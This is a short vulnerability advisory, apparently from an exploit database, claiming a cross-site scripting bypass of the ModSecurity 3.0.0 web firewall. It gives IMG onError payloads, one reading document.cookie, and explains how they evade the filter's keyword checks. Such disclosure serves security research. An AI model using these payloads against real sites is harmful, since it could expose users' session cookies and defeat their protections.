facebook facebook twitter rss

ModSecurity 3.0.0 - Cross-Site Scripting

Author: Rednofozi , Published: 03-09-2018
############################################
# Title : ModSecurity 3.0.0 - Cross-Site Scripting
# Author: Rednofozi
# category : webapps
# Tested On : Mac OS High Sierra
# my team:https://anonysec.org
# me : Rednofozi@yahoo.com
# Vendor HomePage : modsecurity.org
# Sofrware version:ModSecurity
############################################

####################Proof of Concept #############

# Description: ModSecurity 3.0.0 has XSS via an onError attribute of an IMG element

# Details:
# After doing source code analysis, I found that if <img src=x onError=prompt(111)>
# is passed as a parameter, a pop-up is obtained. This is because the filter flags
# terms like "script","alert",etc. Moreover it also flags if there is a string placed
# inside the first bracket. That is why I had to use 111. However document.cookie when
# passed works fine.

Reproduction Steps:

- Use <img src=x onError=prompt(3)> or <img src=x onError=prompt(document.cookie)>



-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------


######################


# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :